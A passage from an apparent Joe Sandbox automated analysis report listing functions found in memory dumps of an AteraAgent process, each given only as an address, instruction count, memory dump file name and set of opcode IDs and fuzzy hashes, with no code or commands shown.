                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C621F85171FACD4FE762976C98645A03FE1EF57254B0E41FAC488CF1B7D929AC09A340
                                                                                                                                                                                                                                          Function 00007FFD9B422B75 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2d5788e1960ae46755dabd938f04b57f84c6f8ac172f4a68a6f2ff949f75824e
                                                                                                                                                                                                                                          • Instruction ID: 6277d3a82299d389f1db75426eca5051794f47abd8ea58f5c847bb0e997dafce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5788e1960ae46755dabd938f04b57f84c6f8ac172f4a68a6f2ff949f75824e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0212B32B4EA495FE77C81BD38B50B42BC1DB9166C70A02BBE18CC71B2D80658469381
                                                                                                                                                                                                                                          Function 00007FFD9B4181AE Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ac9d5260eea2e8e75396c0590189993746121589ecdb32acb8ebb11a6407bd6a
                                                                                                                                                                                                                                          • Instruction ID: 1cc632d0152b42a9992cfedd94ca4fa18fa38beb3d9b935e658d434bbe5729b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac9d5260eea2e8e75396c0590189993746121589ecdb32acb8ebb11a6407bd6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE311A70E1462D8FDB58EF94D869BB9B6B1EF64305F5000ADD01DE72D2CB392984CB51
                                                                                                                                                                                                                                          Function 00007FFD9B423EC0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27ed32c632487de46b9b7f6a890c549e1058da7e809fa7c137e0c68b836ee645
                                                                                                                                                                                                                                          • Instruction ID: 30b99b2150836e1f801f9bfaa4dbe5dc54db243295a0a7d8a2a0a2f2ded90990
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ed32c632487de46b9b7f6a890c549e1058da7e809fa7c137e0c68b836ee645
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112432B2DE180FE668DA5CA81957973C0EB9C765F4001BFF44DC32E6CE156C4282C2
                                                                                                                                                                                                                                          Function 00007FFD9B435B50 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ef0162e2e248a072ca6272be246f7197230aba743c4ce150cf5d4a44656c1805
                                                                                                                                                                                                                                          • Instruction ID: 80487a2efa0d6b435eb1b9f557c5ac8c1b9896c6f12edafc3c72b4674fb67b58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef0162e2e248a072ca6272be246f7197230aba743c4ce150cf5d4a44656c1805
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B031C021A4F7CD1FE76697B488395613FE1AF42214B0E40FBC089CB1E7E9186D0A9361
                                                                                                                                                                                                                                          Function 00007FFD9B419D55 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c766219df3204bc4c556e1846be537766b6bab1c4b01c035f9feaf40ae74999e
                                                                                                                                                                                                                                          • Instruction ID: cefb1414986d960f40352b1a9ebaa3025741209b42dd44788a022c29fa1c91c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c766219df3204bc4c556e1846be537766b6bab1c4b01c035f9feaf40ae74999e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38213722B1C6884FF795D62C64596117FB3DB96224F7E02D9C498EF352C05A9D4283C1
                                                                                                                                                                                                                                          Function 00007FFD9B42AED8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7a40e2ee35e4eddd077709c1b82f9865e7f164304761db15a9f88f44b9a17901
                                                                                                                                                                                                                                          • Instruction ID: 51c3520678d68557fd6deb3a2767c08550bf88513c1209bb705a8ad17147c82b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a40e2ee35e4eddd077709c1b82f9865e7f164304761db15a9f88f44b9a17901
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98214062F0E98D5FE7119BE46821179B7A0EF45308F5500B7E45C870E3DA29AA44A345
                                                                                                                                                                                                                                          Function 00007FFD9B425DCD Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aaabe98e0008cd44db5614ddf4e4bda4ce5a8603f68d8965c0588be26c556231
                                                                                                                                                                                                                                          • Instruction ID: fd9929263f9f11d0c47ebd1cbd442dc05ab23e5c688f0e55e4ce979b6cf2f0b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaabe98e0008cd44db5614ddf4e4bda4ce5a8603f68d8965c0588be26c556231
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49117D32B1EE4D1FE7E9D26C647A2B527C1EBD936571402BBD44DC31A6DD149C035381
                                                                                                                                                                                                                                          Function 00007FFD9B415201 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9061ba0f69eda2415ab2d7ce4119297151c74078e837b6f5a39cb5b71e52f67f
                                                                                                                                                                                                                                          • Instruction ID: 1a9e9257607de1737816e21043d1beaf3f6b7e6d2015f772ba48e42a84caf4fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9061ba0f69eda2415ab2d7ce4119297151c74078e837b6f5a39cb5b71e52f67f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B218E71D18A1D8FDB94EF98D8556EDBBF1FF69300F04006AD419E3295CB35A8418B81
                                                                                                                                                                                                                                          Function 00007FFD9B412E38 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fcfb4e99a844d090022eedc7a7242249d567a88cbb3dff32d76b55aca71c3cc2
                                                                                                                                                                                                                                          • Instruction ID: 9a388d9ae6cecef8f91423b7cdf1e30137265c5cbbe0c6fdc4790d99c518fff1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcfb4e99a844d090022eedc7a7242249d567a88cbb3dff32d76b55aca71c3cc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14214D32E1EACD5FEB64DFA898542E97BE0FF75208F0501BAD45CC71E6DA20AA01C740
                                                                                                                                                                                                                                          Function 00007FFD9B41EAE5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3eba6b3f813d952573402a2b06cb7344231099cf04de55e6a7e38b2e890c86dd
                                                                                                                                                                                                                                          • Instruction ID: 6c716f4ca3255e1b6204d3b0f269bbea60dc5c291d0cafb5f74bdcb475be3604
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eba6b3f813d952573402a2b06cb7344231099cf04de55e6a7e38b2e890c86dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21A771E1EA8D4FEBA9DB68C8656A977B1FF55304F0101BAD44DC21A2DE342982CB40
                                                                                                                                                                                                                                          Function 00007FFD9B41D365 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7234b2c96e31759de3433582a3a77cbaf9d687ae1c6cb1ed62ddfb7173c49180
                                                                                                                                                                                                                                          • Instruction ID: 340422255702360df64567094401303899437effe16f108fbae4b15014c82fd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7234b2c96e31759de3433582a3a77cbaf9d687ae1c6cb1ed62ddfb7173c49180
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A216A62F1EB9A0AD725B338A4616E57BE0EF90318F0611BBD0DDCB1E3EE5875858340
                                                                                                                                                                                                                                          Function 00007FFD9B41BF1D Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62c1909dd077b1fdc4d96524bbff3c6e5aa5c4a18b48788e1499fae5df3f70be
                                                                                                                                                                                                                                          • Instruction ID: 1cd099610774ca73cab6b21b4b6c083b55078d8c0b3ac0a387e530dfc5406fd0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62c1909dd077b1fdc4d96524bbff3c6e5aa5c4a18b48788e1499fae5df3f70be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE212731E1DB8A4FD7A9DB2884759A17BF1FF6530070946FAC049C71D7EE28E8468701
                                                                                                                                                                                                                                          Function 00007FFD9B413AA5 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cb92f2ab70bb1fdd247b1e64872f82db0f48a711d137cd0f9e85aefd9b060900
                                                                                                                                                                                                                                          • Instruction ID: a35509ed821ca02016cdcc992f7f4a946be321c46fac20c9e84c758f10f9cc8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb92f2ab70bb1fdd247b1e64872f82db0f48a711d137cd0f9e85aefd9b060900
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721B1B1E09A0D9FEB50EF68D4156ADB7B2FF65314F1500B5D418EB392CB3AA940DB80
                                                                                                                                                                                                                                          Function 00007FFD9B42E72F Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 29fbca86105c137d1d3eeae06fd503c46bcb4db6267ef2ac4bcb89331f82f285
                                                                                                                                                                                                                                          • Instruction ID: 9988c6dc41ee666ce5a2733094430b3602d713c9abec51c6efbabfe014c041be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29fbca86105c137d1d3eeae06fd503c46bcb4db6267ef2ac4bcb89331f82f285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21D621B1890D0FEFA4FB9C84A5BA833D1EF68300B0440B6D44DC72ABDD24AD419781
                                                                                                                                                                                                                                          Function 00007FFD9B41425B Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e21cdc66a5cd5c2039dd0b153fee370aa830d80f36c5be330f89085d0b984e98
                                                                                                                                                                                                                                          • Instruction ID: 456fff62b198056f28fa8e285089b909cf236b7b760be8591eed8a3903aedff7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e21cdc66a5cd5c2039dd0b153fee370aa830d80f36c5be330f89085d0b984e98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D219D31C8E3C94FD3224BA068225E57F789F03259F1B11EBD088DB4A3C56D569AC7A2
                                                                                                                                                                                                                                          Function 00007FFD9B425E20 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6baa405e26212adc48352bd512c0596e25e2ff9852427f378f5d32344075f7fb
                                                                                                                                                                                                                                          • Instruction ID: ac7ed67a5dac4f8ec7585ddccda0411a57fd5d95bf1a5490f46bd43b2cc3d6d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6baa405e26212adc48352bd512c0596e25e2ff9852427f378f5d32344075f7fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7911C432B1ED0E0FFBE8E29C64A567663D2EBD8269715057BD41EC32A8DD15DC435380
                                                                                                                                                                                                                                          Function 00007FFD9B41ADF8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aa3fcaa2f05d7010ea3c81c50dc89ae7d493b13b42fe1bb9eb5105ad488aa8e7
                                                                                                                                                                                                                                          • Instruction ID: c70df4b80ac98fac27e48e9b31bc01530acb3e97aa2ae07750838aea717fbcde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa3fcaa2f05d7010ea3c81c50dc89ae7d493b13b42fe1bb9eb5105ad488aa8e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2113A21F6EF4E0FE7A9E72C84A05E873D1FFA42147491676C05DC72D6DD18E9428340
                                                                                                                                                                                                                                          Function 00007FFD9B415220 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 97be3dfc0f1f9f2c6acca912e190ca8c69b60106882edb2c40f593ff93376135
                                                                                                                                                                                                                                          • Instruction ID: 8eed8f6189c40b2fbfeb5af2e2024ed0f5b69bbede7d39d322962b294a8d3eaf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be3dfc0f1f9f2c6acca912e190ca8c69b60106882edb2c40f593ff93376135
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86213870E14A1D8FDF94EF98D855AEEB7F1FF69300F00006AE419E3295CB75A8418B81
                                                                                                                                                                                                                                          Function 00007FFD9B4260F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 389ddc4e90e38520bcb1dd930fb59d41a01747d357a7fff3370f1acc3384764f
                                                                                                                                                                                                                                          • Instruction ID: 0d3148e57c3dd55d04426cbe31b7c6cc6fdde3c82acf83a3ad60f8f1c6bbe058
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 389ddc4e90e38520bcb1dd930fb59d41a01747d357a7fff3370f1acc3384764f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D611E532B0FD4D1FE6E484ED3CA51753AC6DB9961970601FBE84CC7277DC26AC419281
                                                                                                                                                                                                                                          Function 00007FFD9B427136 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7967b366c1738104244d1e4ada21b959e62358e918941facef09d781e8c192e8
                                                                                                                                                                                                                                          • Instruction ID: e1913c73ed4fea81d013f62667f0f2c8a189cefaa0cc19c0ac92949665d062cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7967b366c1738104244d1e4ada21b959e62358e918941facef09d781e8c192e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611AC7050DB885FE778AF288818BB67BE5EFA9310F01457E948CC3262EE3068418742
                                                                                                                                                                                                                                          Function 00007FFD9B425EA9 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3145458ec5d3e0d6d673f874d939f16ff9a78070a4a35d1ea01df3c5318c2f3a
                                                                                                                                                                                                                                          • Instruction ID: 68ab9d33cef03f6e5633babe8b03e30226572990c1ccb8fceb969cadd9194bcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3145458ec5d3e0d6d673f874d939f16ff9a78070a4a35d1ea01df3c5318c2f3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13113631B1E98E0FEBA8D7AC54742B437C1FF88205B4540BAD84CC72A2DE19AD01A340
                                                                                                                                                                                                                                          Function 00007FFD9B42EA67 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 31ccd8f2c0a7d37584fdeb68dd68ca7f351c1c1bdc85394c7350db7517358e5a
                                                                                                                                                                                                                                          • Instruction ID: 1da8985d1f5a90c070d2ec4800ba308918adbe94fc32ce340a8c5c3ac739f33a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31ccd8f2c0a7d37584fdeb68dd68ca7f351c1c1bdc85394c7350db7517358e5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9211292274FE8D4FF76A96A818715B13BD1EF57624B0A01FBD088C6293DD496982E341
                                                                                                                                                                                                                                          Function 00007FFD9B425312 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2751dc08ea5f6a3343dcd65c9afb05d5c74fd6c6ba974fd64b0d1dcd923ce1e5
                                                                                                                                                                                                                                          • Instruction ID: 5096dad10901d77ccb5081c120acea2bcbeafb8476db4715a237771242e5b5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2751dc08ea5f6a3343dcd65c9afb05d5c74fd6c6ba974fd64b0d1dcd923ce1e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03117062B0EE4F4FFBB8D69C906426463D1EBA83A471455BAD00DC31A5DE50FC06A740
                                                                                                                                                                                                                                          Function 00007FFD9B4260E9 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
